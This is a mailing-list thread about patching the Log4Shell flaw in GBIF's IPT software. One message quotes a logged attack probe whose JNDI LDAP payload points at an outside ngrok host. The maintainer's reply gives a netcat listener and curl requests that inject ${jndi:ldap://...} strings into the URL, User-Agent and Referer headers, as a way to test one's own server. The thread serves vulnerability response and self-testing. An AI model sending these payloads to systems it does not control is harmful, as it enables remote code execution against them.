[IPT] IPT security update (Log4J / Log4Shell exploit)
Matthew Blissett
mblissett at gbif.org
Mon Dec 13 14:26:37 UTC 2021
Hi Julien,
I don't think there would be a problem with these specific requests.
The attacker has to make the IPT log the "jndi" string in the
data-directory/logs/debug.log or admin.log files. You could test your
own server, for example by listening on a TCP socket:
nc -lvp 1234
and running a similar request:
curl https://ipt.example.org/${jndi:ldap://127.0.0.1:1234/anything}
-H "User-Agent: ${jndi:ldap://127.0.0.1:1234/anything}" -H "Referer:
${jndi:ldap://127.0.0.1:1234/anything}"
if you have any output from 'nc', there is potential for an exploit.
Cheers,
Matthew
On 13/12/2021 14:14, Julien Cigar wrote:
> Hi Matthew,
>
> As we've several hosted IPTs I upgraded immediately but after checking
> the logs it looks like it wasn't fast enough:
>
> logging% bzgrep 'jndi' http-access.log.*|grep 'ipt'
> http-access.log.1.bz2:Dec 11 17:04:39 router1 haproxy[14902]: 185.220.101.130 - - [11/Dec/2021:16:04:36 +0000] "GET /$%7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google%7D HTTP/1.1" 200 169114 "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "$#7Bjndi:ldap://c52a-146-56-186-40.ngrok.io/google#7D" "ipt.biodiversity.aq"
>
> Our ipts are hosted in dedicated (FreeBSD) jails and I haven't noticed
> something suspicious.. but is there anything that I should check for
> specificaly?
>
> Thanks,
> Julien
>
>
> On Sat, Dec 11, 2021 at 10:55:35AM +0100, Matthew Blissett wrote:
>> Dear IPT users,
>>
>> We have released a new version of the IPT, version 2.5.4 [1]. This version
>> contains fixes to critical security issues with the Struts and Log4J[2]
>> libraries.
>>
>> According to the press [3], the problem with the Log4J library vulnerability
>> is being exploited by malicious users — and I can already see queries
>> containing "jndi" in the web server logs for the IPTs GBIF hosts at
>> cloud.gbif.org, although they are random attempts and would not succeed.
>>
>> All users are highly encouraged to upgrade to this version as soon as
>> possible.
>>
>> As usual, upgrade and installation instructions are in the manual [1].
>> Please remember to check your data directory backup is working before
>> starting the upgrade.
>>
>> [1] https://ipt.gbif.org/manual/en/ipt/2.5/releases#2-5-4-december-2021
>>
>> [2] https://www.lunasec.io/docs/blog/log4j-zero-day/
>>
>> [3] https://www.theguardian.com/technology/2021/dec/10/software-flaw-most-critical-vulnerability-log-4-shell
>>
>> Best regards,
>>
>> Matthew
>>
>>
>> _______________________________________________
>> IPT mailing list
>> IPT at lists.gbif.org
>> https://lists.gbif.org/mailman/listinfo/ipt
More information about the IPT
mailing list